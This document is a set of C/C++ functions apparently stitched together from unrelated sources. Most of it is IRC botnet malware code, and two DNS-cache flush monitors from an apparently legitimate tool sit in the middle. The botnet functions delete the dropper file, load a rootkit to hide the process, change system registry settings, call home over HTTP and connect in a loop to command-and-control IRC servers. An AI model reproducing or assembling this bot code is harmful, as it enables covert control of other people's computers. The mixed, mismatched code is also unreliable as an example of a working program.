DWORD WINAPI IRC_Connect(LPVOID param) { IRC irc = *((IRC *)param); IRC *ircs = (IRC *)param; ircs->gotinfo = TRUE; int rval = 0; SOCKADDR_IN ssin; while (1) { memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(irc.port); if ((ssin.sin_addr.s_addr=ResolveAddress(irc.host)) == 0) break; memset(threads[irc.threadnum].nick, 0, sizeof(threads[irc.threadnum].nick)); rndnick(threads[irc.threadnum].nick, nicktype, nickprefix); if ((threads[irc.threadnum].sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { Sleep(5000); continue; } if (fconnect(threads[irc.threadnum].sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { fclosesocket(threads[irc.threadnum].sock); FlushDNSCache(); Sleep(5000); continue; } #ifdef DEBUG_CONSOLE printf("Bot started and connect to %s.\n", irc.host); #endif addlogv("[MAIN]: Connected to %s.", irc.host); rval = IRC_ReceiveLoop(threads[irc.threadnum].sock, irc.host, irc.channel, irc.chanpass, threads[irc.threadnum].nick, irc.clone); fclosesocket(threads[irc.threadnum].sock); if (rval == 0) continue; else if (rval == 1) { Sleep(900000); continue; } else if (rval == 2) break; } clearthread(irc.threadnum); return rval; }
DWORD WINAPI Bthd(LPVOID param) { for (int m=0;m<6;m++) { if(!(xetum=CreateMutex(NULL, FALSE, xetumhandle))) Sleep(5000); else break; } if (WaitForSingleObject(CreateMutex(NULL, TRUE, xetumhandle), 30000) == WAIT_TIMEOUT) ExitProcess(0); addthread(MAIN_THREAD,str_main_thread,main_title); srand(GetTickCount()); dwstarted=GetTickCount(); WSADATA wsadata; if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0) ExitProcess(-2); int i=0; DWORD id=0; char *ip; char hostname[256]; struct hostent *h; fgethostname(hostname, 256); h = fgethostbyname(hostname); ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]); strncpy(inip,ip,sizeof(inip)); curserver=0; HookProtocol(&mainirc); while (mainirc.should_connect()) { if (!mainirc.is_connected()) { #ifdef _DEBUG printf("Trying to connect to: %s:%i\r\n",sinfo[curserver].host,sinfo[curserver].port); #endif #ifndef NO_FLUSHDNS FlushDNSCache(); #endif mainirc.start(sinfo[curserver].host,sinfo[curserver].port, mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN), mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),sinfo[curserver].pass); mainirc.message_loop(); } else mainirc.message_loop(); Sleep(SFLOOD_DELAY); if (curserver==(srvsz-1)) curserver=0; else curserver++; } // cleanup; //killthreadall(); fWSACleanup(); ReleaseMutex(xetum); ExitThread(0); return TRUE; }
//Flush DNS cache FIFO Monitor bool FlushDNSFIFOMonitor( void) { //Create FIFO and create its notify monitor. unlink(FIFO_PATH_NAME); if (mkfifo(FIFO_PATH_NAME, O_CREAT) == RETURN_ERROR || chmod(FIFO_PATH_NAME, S_IRUSR|S_IWUSR|S_IWGRP|S_IWOTH) == RETURN_ERROR) { PrintError(LOG_LEVEL_2, LOG_ERROR_SYSTEM, L"Create FIFO error", errno, nullptr, 0); unlink(FIFO_PATH_NAME); return false; } //FIFO Monitor std::shared_ptr<uint8_t> Buffer(new uint8_t[FILE_BUFFER_SIZE]()); memset(Buffer.get(), 0, FILE_BUFFER_SIZE); std::string Message; int FIFO_Handle = 0; ssize_t Length = 0; for (;;) { memset(Buffer.get(), 0, FILE_BUFFER_SIZE); //Open FIFO. FIFO_Handle = open(FIFO_PATH_NAME, O_RDONLY, 0); if (FIFO_Handle == RETURN_ERROR) { PrintError(LOG_LEVEL_2, LOG_ERROR_SYSTEM, L"Create FIFO error", errno, nullptr, 0); unlink(FIFO_PATH_NAME); return false; } //Read file data. Length = read(FIFO_Handle, Buffer.get(), FILE_BUFFER_SIZE); if (Length == RETURN_ERROR || Length < (ssize_t)DOMAIN_MINSIZE || Length > (ssize_t)DOMAIN_MAXSIZE) { PrintError(LOG_LEVEL_3, LOG_ERROR_SYSTEM, L"FIFO read messages error", errno, nullptr, 0); } else { Message = (const char *)Buffer.get(); //Read message. if (Message == FIFO_MESSAGE_FLUSH_DNS) //Flush all DNS cache. FlushDNSCache(nullptr); else if (Message.find(FIFO_MESSAGE_FLUSH_DNS_DOMAIN) == 0 && //Flush single domain cache. Message.length() > strlen(FIFO_MESSAGE_FLUSH_DNS_DOMAIN) + DOMAIN_MINSIZE && //Domain length check Message.length() < strlen(FIFO_MESSAGE_FLUSH_DNS_DOMAIN) + DOMAIN_MAXSIZE) FlushDNSCache((const uint8_t *)Message.c_str() + strlen(FIFO_MESSAGE_FLUSH_DNS_DOMAIN)); else Sleep(Parameter.FileRefreshTime); } //Close FIFO. close(FIFO_Handle); FIFO_Handle = 0; } //Monitor terminated close(FIFO_Handle); unlink(FIFO_PATH_NAME); PrintError(LOG_LEVEL_2, LOG_ERROR_SYSTEM, L"FIFO module Monitor terminated", 0, nullptr, 0); return true; }
//MailSlot of flush DNS cache Monitor bool FlushDNSMailSlotMonitor( void) { //System security setting std::shared_ptr<uint8_t> ACL_Buffer(new uint8_t[FILE_BUFFER_SIZE]()); memset(ACL_Buffer.get(), 0, FILE_BUFFER_SIZE); SECURITY_ATTRIBUTES SecurityAttributes; SECURITY_DESCRIPTOR SecurityDescriptor; memset(&SecurityAttributes, 0, sizeof(SecurityAttributes)); memset(&SecurityDescriptor, 0, sizeof(SecurityDescriptor)); PSID SID_Value = nullptr; InitializeSecurityDescriptor(&SecurityDescriptor, SECURITY_DESCRIPTOR_REVISION); InitializeAcl((PACL)ACL_Buffer.get(), FILE_BUFFER_SIZE, ACL_REVISION); ConvertStringSidToSidW(SID_ADMINISTRATORS_GROUP, &SID_Value); AddAccessAllowedAce((PACL)ACL_Buffer.get(), ACL_REVISION, GENERIC_ALL, SID_Value); SetSecurityDescriptorDacl(&SecurityDescriptor, true, (PACL)ACL_Buffer.get(), false); SecurityAttributes.lpSecurityDescriptor = &SecurityDescriptor; SecurityAttributes.bInheritHandle = true; //Create mailslot. HANDLE hSlot = CreateMailslotW(MAILSLOT_NAME, FILE_BUFFER_SIZE - 1U, MAILSLOT_WAIT_FOREVER, &SecurityAttributes); if (hSlot == INVALID_HANDLE_VALUE) { LocalFree(SID_Value); PrintError(LOG_LEVEL_2, LOG_ERROR_SYSTEM, L"Create mailslot error", GetLastError(), nullptr, 0); return false; } ACL_Buffer.reset(); LocalFree(SID_Value); //Initialization std::shared_ptr<wchar_t> lpszBuffer(new wchar_t[FILE_BUFFER_SIZE]()); wmemset(lpszBuffer.get(), 0, FILE_BUFFER_SIZE); std::wstring Message; std::string Domain; DWORD cbMessage = 0; BOOL Result = 0; //MailSlot monitor for (;;) { //Reset parameters. wmemset(lpszBuffer.get(), 0, FILE_BUFFER_SIZE); cbMessage = 0; //Read message from mailslot. Result = ReadFile(hSlot, lpszBuffer.get(), FILE_BUFFER_SIZE, &cbMessage, nullptr); if (Result == FALSE) { PrintError(LOG_LEVEL_3, LOG_ERROR_SYSTEM, L"MailSlot read messages error", GetLastError(), nullptr, 0); CloseHandle(hSlot); return false; } else { Message = lpszBuffer.get(); Domain.clear(); //Read message. if (Message == MAILSLOT_MESSAGE_FLUSH_DNS) //Flush all DNS cache. { FlushDNSCache(nullptr); } else if (Message.find(MAILSLOT_MESSAGE_FLUSH_DNS_DOMAIN) == 0 && //Flush single domain cache. Message.length() > wcslen(MAILSLOT_MESSAGE_FLUSH_DNS_DOMAIN) + DOMAIN_MINSIZE && //Domain length check Message.length() < wcslen(MAILSLOT_MESSAGE_FLUSH_DNS_DOMAIN) + DOMAIN_MAXSIZE) { if (WCSToMBSString(Message.c_str() + wcslen(MAILSLOT_MESSAGE_FLUSH_DNS_DOMAIN), DOMAIN_MAXSIZE, Domain) && Domain.length() > DOMAIN_MINSIZE && Domain.length() < DOMAIN_MAXSIZE) FlushDNSCache((const uint8_t *)Domain.c_str()); else PrintError(LOG_LEVEL_2, LOG_ERROR_SYSTEM, L"Convert multiple byte or wide char string error", 0, nullptr, 0); } else { Sleep(Parameter.FileRefreshTime); } } } //Monitor terminated CloseHandle(hSlot); PrintError(LOG_LEVEL_2, LOG_ERROR_SYSTEM, L"MailSlot module Monitor terminated", 0, nullptr, 0); return false; }
DWORD WINAPI BotThread(LPVOID param) { for (int m=0;m<6;m++) { if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle))) Sleep(5000); else break; } // if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT) // ExitProcess(0); addthread(MAIN_THREAD,str_main_thread,main_title); #ifndef _DEBUG #ifndef NO_MELT char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name); if (melt) { SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL); int tries=0; while (FileExists(melt) && tries<3) { DeleteFile(melt); tries++; Sleep(2000); } RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name); } #endif // NO_MELT #endif // _DEBUG srand(GetTickCount()); dwstarted=GetTickCount(); #ifndef NO_VERSION_REPLY curversion=rand()%(versionsize); #ifdef _DEBUG printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]); #endif #endif WSADATA wsadata; if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0) ExitProcess(-2); #ifndef _DEBUG #ifndef NO_FCONNECT char readbuf[1024]; HINTERNET httpopen, openurl; DWORD read; httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0); openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL); if (!openurl) { fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); } fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read); fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); #endif // NO_FCONNECT #endif // _DEBUG #ifndef NO_INSTALLED_TIME if (!noadvapi32) GetInstalledTime(); else sprintf(installedt,"Error"); #endif // NO_INSTALLED_TIME int i=0; DWORD id=0; #ifndef NO_RECORD_UPTIME i=addthread(RUPTIME_THREAD,str_rup_thread,main_title); threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id); #endif // NO_RECORD_UPTIME #ifndef NO_AUTO_SECURE #ifndef NO_SECURE NTHREAD secure; secure.bdata2=TRUE;//loop i=addthread(SECURE_THREAD,str_asecure_thread,sec_title); threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id); #endif #endif // NO_AUTO_SECURE #ifndef NO_RDRIV #ifndef _DEBUG rkenabled=InitRK();//initialize fu if (rkenabled) HideMe();//hide the process #endif // _DEBUG #endif // NO_RDRIV #ifndef _DEBUG // maybe this will give the shutdown handler time to work RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000"); #endif //get internal ip char *ip; char hostname[256]; struct hostent *h; fgethostname(hostname, 256); h = fgethostbyname(hostname); ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]); strncpy(inip,ip,sizeof(inip)); curserver=0; HookProtocol(&mainirc); while (mainirc.should_connect()) { if (!mainirc.is_connected()) { #ifdef _DEBUG printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port); #endif #ifndef NO_FLUSHDNS FlushDNSCache(); #endif mainirc.start(servers[curserver].host,servers[curserver].port, mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN), mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass); mainirc.message_loop(); } else mainirc.message_loop(); Sleep(SFLOOD_DELAY); if (curserver==(serversize-1)) curserver=0; else curserver++; } // cleanup; killthreadall(); fWSACleanup(); ReleaseMutex(mutex); ExitThread(0); }